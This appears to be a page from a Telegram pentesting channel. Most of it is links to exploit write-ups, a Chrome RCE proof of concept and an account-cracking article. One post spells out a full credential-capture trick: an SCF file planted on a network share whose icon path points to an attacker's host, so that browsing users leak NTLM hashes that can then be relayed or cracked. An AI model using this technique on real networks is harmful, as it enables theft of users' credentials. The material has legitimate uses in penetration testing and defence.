Pentester
2.92K subscribers
119 photos
3 videos
163 files
2.77K links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security
Download Telegram
Need creds on a local network? Found an open network share?

1) Create an scf file with the following: 
[Shell] Command=2 IconFile=\\X.X.X.X\share\test.ico 
[Taskbar] Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy
Mass Cracking Cybrary Accounts – Somdev Sangwan
https://s0md3v.github.io/mass-cracking-cybrary-accounts/
Notes on fuzzing ImageMagick and GraphicsMagick - The Blagoblag
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/
[PoC] [CVE-2018-18354] Chrome remote code execution attack chain

Ignore Sandbox , Ignore Applock , Ignore download restriction
combined 3 bugs into logical vulnerability attack chain

https://t.co/IUWnx1mgZM
DnsCache. reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver
https://t.co/YDhPvp9LKU
Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375) | IOActive
https://ioactive.com/discovering-and-exploiting-a-vulnerability-in-androids-personal-dictionary/